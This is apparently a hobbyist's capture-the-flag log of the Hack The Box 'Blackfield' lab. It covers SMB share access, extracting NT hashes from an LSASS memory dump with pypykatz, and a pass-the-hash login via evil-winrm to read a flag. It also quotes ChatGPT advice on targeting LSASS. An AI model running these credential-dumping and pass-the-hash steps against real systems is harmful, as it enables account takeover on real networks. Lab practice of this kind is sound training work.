BLACKFIELD995218         BLACKFIELD996878         BLACKFIELD997545         
BLACKFIELD998321         Guest                    Ipwn3dYouCompany
krbtgt                   lydericlefebvre          support           
Ipwn3dYouCompany

Il try and see if we can get the hash

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/Ipwn3dYouCompany         

Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]

check the other folder

└─$ smbclient \\\\10.10.10.192\\forensic -U audit2020%'Password123!'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 08:03:16 2020
  ..                                  D        0  Sun Feb 23 08:03:16 2020
  commands_output                     D        0  Sun Feb 23 13:14:37 2020
  memory_analysis                     D        0  Thu May 28 16:28:33 2020
  tools                               D        0  Sun Feb 23 08:39:08 2020

                5102079 blocks of size 4096. 1678438 blocks available
smb: \> cd memory_analysis
smb: \memory_analysis\> ls
  .                                   D        0  Thu May 28 16:28:33 2020
  ..                                  D        0  Thu May 28 16:28:33 2020
  conhost.zip                         A 37876530  Thu May 28 16:25:36 2020
  ctfmon.zip                          A 24962333  Thu May 28 16:25:45 2020
  dfsrs.zip                           A 23993305  Thu May 28 16:25:54 2020
  dllhost.zip                         A 18366396  Thu May 28 16:26:04 2020
  ismserv.zip                         A  8810157  Thu May 28 16:26:13 2020
  lsass.zip                           A 41936098  Thu May 28 16:25:08 2020
  mmc.zip                             A 64288607  Thu May 28 16:25:25 2020
  RuntimeBroker.zip                   A 13332174  Thu May 28 16:26:24 2020
  ServerManager.zip                   A 131983313  Thu May 28 16:26:49 2020
  sihost.zip                          A 33141744  Thu May 28 16:27:00 2020
  smartscreen.zip                     A 33756344  Thu May 28 16:27:11 2020
  svchost.zip                         A 14408833  Thu May 28 16:27:19 2020
  taskhostw.zip                       A 34631412  Thu May 28 16:27:30 2020
  winlogon.zip                        A 14255089  Thu May 28 16:27:38 2020
  wlms.zip                            A  4067425  Thu May 28 16:27:44 2020
  WmiPrvSE.zip                        A 18303252  Thu May 28 16:27:53 2020

                5102079 blocks of size 4096. 1678438 blocks available
smb: \memory_analysis\> 


i output this to chatGPT and asked it “anything interesting you see here:” and it told me

lsass.zip: This stands out immediately. LSASS (Local Security Authority Subsystem Service) manages the system’s authentication policy and might contain authentication credentials in memory. Attackers frequently target this process to extract clear-text passwords, hashes, Kerberos tickets, etc. Tools like Mimikatz can parse LSASS memory dumps for credentials.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cd lsass 
cd: no such file or directory: lsass
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
20230910090640_computers.json  blackfield        cleaned_users.txt  domain_users.txt  users2.txt
20230910090640_domains.json    blackfield.gnmap  cleanusers2.txt    kerbrute          users.txt
20230910090640_groups.json     blackfield.nmap   domain_admins.txt  lsass.DMP
20230910090640_users.json      blackfield.xml    domain_groups.txt  lsass.zip
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cd lsass.DMP
cd: not a directory: lsass.DMP
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

Google how to work on this lsass.dmp

following this article

get mimikatz.py and cp to blackfield folder

nt.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23657 (23K) [text/plain]
Saving to: ‘mimikatz.py’

mimikatz.py                   100%[==============================================>]  23.10K  --.-KB/s    in 0.002s  

2023-09-10 10:10:12 (10.7 MB/s) - ‘mimikatz.py’ saved [23657/23657]

                                                                                                                     
┌──(kali㉿kali)-[~/Downloads]
└─$ ls                                   
 10.10.10.175:80                BloodHound-linux-x64.zip          'mimikatz(1).exe'     System.ValueTuple.dll
 10.10.10_files                 code_1.81.1-1691620686_amd64.deb   mimikatz.exe         Win32
 aclpwn.py                      Invoke-Mimikatz.ps1                mimikatz.py          winPEASx64.exe
 Bloodhound_3                   kerbrute_linux_amd64               mimikatz_trunk       winPEASx86.exe
 BloodHound-3.0.5.zip           kiwi_passwords.yar                 mimikatz_trunk.zip   x64
'BloodHound-linux-x64(1).zip'   mimicom.idl                        README.md
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads]
└─$ cp mimikatz.py ~/HTB/blackfield      
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads]
└─$ 

modified the mimikat.py so it can run with python3. recommendation by chatGPT after i got the error

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$  2to3 -w mimikatz.py 
/usr/bin/2to3:3: DeprecationWarning: lib2to3 package is deprecated and may not be able to parse Python 3.10+
  from lib2to3.main import main
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored mimikatz.py
--- mimikatz.py (original)
+++ mimikatz.py (refactored)
@@ -296,12 +296,12 @@
     return cleartext
 
   def dump(self):
-    print 'Dumping LSA Decryptor'
-    print '     IV ({}): {}'.format(len(self.iv), self.iv.encode('hex'))
-    print 'DES_KEY ({}): {}'.format(
-        len(self.des_key), self.des_key.encode('hex'))
-    print 'AES_KEY ({}): {}'.format(
-        len(self.aes_key), self.aes_key.encode('hex'))
+    print('Dumping LSA Decryptor')
+    print('     IV ({}): {}'.format(len(self.iv), self.iv.encode('hex')))
+    print('DES_KEY ({}): {}'.format(
+        len(self.des_key), self.des_key.encode('hex')))
+    print('AES_KEY ({}): {}'.format(
+        len(self.aes_key), self.aes_key.encode('hex')))
 
     
 class LsaDecryptor_x86(LsaDecryptor, Mimikatz_x86):
RefactoringTool: Files that were modified:
RefactoringTool: mimikatz.py
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 


had to install missing dependency “construct”

└─$ python3 mimikatz.py
Traceback (most recent call last):
  File "/home/kali/HTB/blackfield/mimikatz.py", line 31, in <module>
    import construct
ModuleNotFoundError: No module named 'construct'
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pip3 install construct

Defaulting to user installation because normal site-packages is not writeable
Collecting construct
  Downloading construct-2.10.68.tar.gz (57 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 57.9/57.9 kB 743.5 kB/s eta 0:00:00
  Preparing metadata (setup.py) ... done
Building wheels for collected packages: construct
  Building wheel for construct (setup.py) ... done
  Created wheel for construct: filename=construct-2.10.68-py3-none-any.whl size=59223 sha256=179a525c80f0ba0da8cea12f3129cb9dd0057e596e5043292f28804f35adecbc
  Stored in directory: /home/kali/.cache/pip/wheels/6a/5b/a1/35e70b419451f0f619898c0f9ec10f3d920721daed7bc24eab
Successfully built construct
Installing collected packages: construct
Successfully installed construct-2.10.68

had to install volatility again a missing dependency

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ python3 mimikatz.py   
Traceback (most recent call last):
  File "/home/kali/HTB/blackfield/mimikatz.py", line 35, in <module>
    import volatility.obj as obj
ModuleNotFoundError: No module named 'volatility'
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pip3 install volatility3

Defaulting to user installation because normal site-packages is not writeable
Collecting volatility3
  Downloading volatility3-2.4.1-py3-none-any.whl (687 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 687.5/687.5 kB 3.0 MB/s eta 0:00:00
Requirement already satisfied: pefile>=2017.8.1 in /usr/lib/python3/dist-packages (from volatility3) (2023.2.7)
Installing collected packages: volatility3
  WARNING: The scripts vol and volshell are installed in '/home/kali/.local/bin' which is not on PATH.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
Successfully installed volatility3-2.4.1
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

many issues only to realise we have mimikatz.py under impacket


┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ locate mimikatz.py  
/usr/share/doc/python3-impacket/examples/mimikatz.py
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

i try to run mimikatz.py

└─$ python3 /usr/share/doc/python3-impacket/examples/mimikatz.py
Impacket v0.11.0 - Copyright 2023 Fortra

usage: mimikatz.py [-h] [-file FILE] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                   [-dc-ip ip address] [-target-ip ip address]
                   target

SMB client implementation.

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

options:
  -h, --help            show this help message and exit
  -file FILE            input file with commands to execute in the mini shell
  -debug                Turn DEBUG output ON

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on
                        target parameters. If valid credentials cannot be found, it will use the ones specified in
                        the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN)
                        specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target.
                        This is useful when target is the NetBIOS name and you cannot resolve it
                                                                                                  

i am going to run the mimikaz exe with wine instead

Have to install wine on my kali

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ sudo dpkg --add-architecture i386 
sudo apt update

Get:1 http://packages.microsoft.com/repos/code stable InRelease [3,569 B]
Get:2 http://packages.microsoft.com/repos/code stable/main armhf Packages [79.5 kB]                                 
Hit:4 http://deb.debian.org/debian oldstable InRelease                                              
Get:5 http://packages.microsoft.com/repos/code stable/main arm64 Packages [79.2 kB]                
Get:6 http://packages.microsoft.com/repos/code stable/main amd64 Packages [78.6 kB]    
Hit:3 http://kali.download/kali kali-rolling InRelease                                                              
Hit:7 https://debian.neo4j.com stable InRelease                                
Get:8 http://deb.debian.org/debian oldstable/main i386 Packages [8,122 kB]
Get:9 http://kali.download/kali kali-rolling/main i386 Packages [19.1 MB]
Get:10 https://debian.neo4j.com stable/3.5 i386 Packages [10.2 kB] 
Get:11 http://deb.debian.org/debian oldstable/main i386 Contents (deb) [10.2 MB]                        
Get:12 http://kali.download/kali kali-rolling/main i386 Contents (deb) [43.8 MB]  
Get:13 http://deb.debian.org/debian oldstable/contrib i386 Packages [45.4 kB]                                       
Get:14 http://deb.debian.org/debian oldstable/contrib i386 Contents (deb) [33.6 kB]                                 
Get:15 http://deb.debian.org/debian oldstable/non-free i386 Packages [79.3 kB]                                      
Get:16 http://deb.debian.org/debian oldstable/non-free i386 Contents (deb) [29.2 kB]                                
Get:17 http://kali.download/kali kali-rolling/non-free i386 Packages [176 kB]                                       
Get:18 http://kali.download/kali kali-rolling/non-free i386 Contents (deb) [862 kB]                                 
Get:19 http://kali.download/kali kali-rolling/contrib i386 Packages [99.9 kB]                                       
Get:20 http://kali.download/kali kali-rolling/contrib i386 Contents (deb) [138 kB]                                  
Fetched 83.0 MB in 23s (3,545 kB/s)                                                                                 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
13 packages can be upgraded. Run 'apt list --upgradable' to see them.
W: http://packages.microsoft.com/repos/code/dists/stable/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: http://deb.debian.org/debian/dists/oldstable/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: http://http.kali.org/kali/dists/kali-rolling/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: https://debian.neo4j.com/dists/stable/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: https://debian.neo4j.com/dists/stable/InRelease: Key is stored in legacy trusted.gpg keyring (/etc/apt/trusted.gpg), see the DEPRECATION section in apt-key(8) for details.
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ sudo apt install wine64

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done

mimikazt fails me 🙁

mimikatz # sekurlsa::minidump lsass.DMP
Switch to MINIDUMP : 'lsass.DMP'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.DMP' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

mimikatz #

there is an implemention of mimikatz in python calledd pypykatz

installing it via pip

└─$ pip3 install pypykatz
Defaulting to user installation because normal site-packages is not writeable
DEPRECATION: Loading egg at /usr/local/lib/python3.11/dist-packages/volatility-2.6.1-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
Requirement already satisfied: pypykatz in /usr/lib/python3/dist-packages (0.6.6)
Requirement already satisfied: aesedb>=0.1.3 in /usr/lib/python3/dist-packages (from pypykatz) (0.1.3)
Requirement already satisfied: aiosmb>=0.4.4 in /usr/lib/python3/dist-packages (from pypykatz) (0.4.4)
Requirement already satisfied: aiowinreg>=0.0.7 in /usr/lib/python3/dist-packages (from pypykatz) (0.0.7)
Requirement already satisfied: minidump>=0.0.21 in /usr/lib/python3/dist-packages (from pypykatz) (0.0.21)
Requirement already satisfied: minikerberos>=0.4.0 in /usr/lib/python3/dist-packages (from pypykatz) (0.4.0)
Requirement already satisfied: msldap>=0.4.7 in /usr/lib/python3/dist-packages (from pypykatz) (0.4.7)
Requirement already satisfied: tqdm in /usr/lib/python3/dist-packages (from pypykatz) (4.64.1)
Requirement already satisfied: unicrypto>=0.0.10 in /usr/lib/python3/dist-packages (from pypykatz) (0.0.10)
Requirement already satisfied: winacl>=0.1.6 in /usr/lib/python3/dist-packages (from pypykatz) (0.1.7)
Requirement already satisfied: colorama in /usr/lib/python3/dist-packages (from aesedb>=0.1.3->pypykatz) (0.4.6)
Requirement already satisfied: asyauth>=0.0.8 in /usr/lib/python3/dist-packages (from aiosmb>=0.4.4->pypykatz) (0.0.9)
Requirement already satisfied: asysocks>=0.2.2 in /usr/lib/python3/dist-packages (from aiosmb>=0.4.4->pypykatz) (0.2.2)
Requirement already satisfied: asn1crypto>=1.3.0 in /usr/lib/python3/dist-packages (from minikerberos>=0.4.0->pypykatz) (1.5.1)
Requirement already satisfied: oscrypto>=1.2.1 in /usr/lib/python3/dist-packages (from minikerberos>=0.4.0->pypykatz) (1.3.0)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from minikerberos>=0.4.0->pypykatz) (1.16.0)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from unicrypto>=0.0.10->pypykatz) (3.11.0)
Requirement already satisfied: cryptography>=38.0.1 in /usr/lib/python3/dist-packages (from winacl>=0.1.6->pypykatz) (38.0.4)

i asked chatGPT for teh command and it gave me – -pypykatz lsa minidump lsass.DMP -o output.txt

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pypykatz lsa minidump lsass.DMP -o output.txt

INFO:pypykatz:Parsing file lsass.DMP
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
20230910090640_computers.json  blackfield        cleaned_users.txt  domain_users.txt  mimikatz.exe     users2.txt
20230910090640_domains.json    blackfield.gnmap  cleanusers2.txt    kerbrute          mimikatz.py      users.txt
20230910090640_groups.json     blackfield.nmap   domain_admins.txt  lsass.DMP         mimikatz.py.bak  volatility
20230910090640_users.json      blackfield.xml    domain_groups.txt  lsass.zip         output.txt
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

we get hashes for administrator and for svc_backup

administrator

== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
        == MSV ==
                Username: Administrator
                Domain: BLACKFIELD
                LM: NA
                NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
                SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
                DPAPI: 240339f898b6ac4ce3f34702e4a89550
        == WDIGEST [25869]==
                username Administrator
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: Administrator
                Domain: BLACKFIELD.LOCAL
        == WDIGEST [25869]==
                username Administrator
                domainname BLACKFIELD
                password None
                password (hex)
        == DPAPI [25869]==
                luid 153705
                key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
                masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
                sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9


svc_backup

FILE: ======== lsass.DMP =======

== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef621
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)

using evil-wrm on both

administrator – no luck

┌──(kali㉿kali)-[~/Downloads/x64]
└─$ crackmapexec winrm 10.10.10.161 -u Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

[*] completed: 100.00% (1/1)
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ evil-winrm -i 10.10.10.192 -u  Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        
Error: Exiting with code 1

svc_backup – Phew we are in and get a flag

┌──(kali㉿kali)-[~/Downloads/x64]
└─$ evil-winrm -i 10.10.10.192 -u  svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> ls
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../
*Evil-WinRM* PS C:\Users\svc_backup> cd dektop
Cannot find path 'C:\Users\svc_backup\dektop' because it does not exist.
At line:1 char:1
+ cd dektop
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\svc_backup\dektop:String) [Set-Location], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
*Evil-WinRM* PS C:\Users\svc_backup> cd Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat users.txt
Cannot find path 'C:\Users\svc_backup\Desktop\users.txt' because it does not exist.
At line:1 char:1
+ cat users.txt
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\svc_backup\Desktop\users.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls


    Directory: C:\Users\svc_backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/28/2020   2:26 PM             32 user.txt


*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
3920bb317a0bef51027e2852be64b543

Privilege escalation – To be continues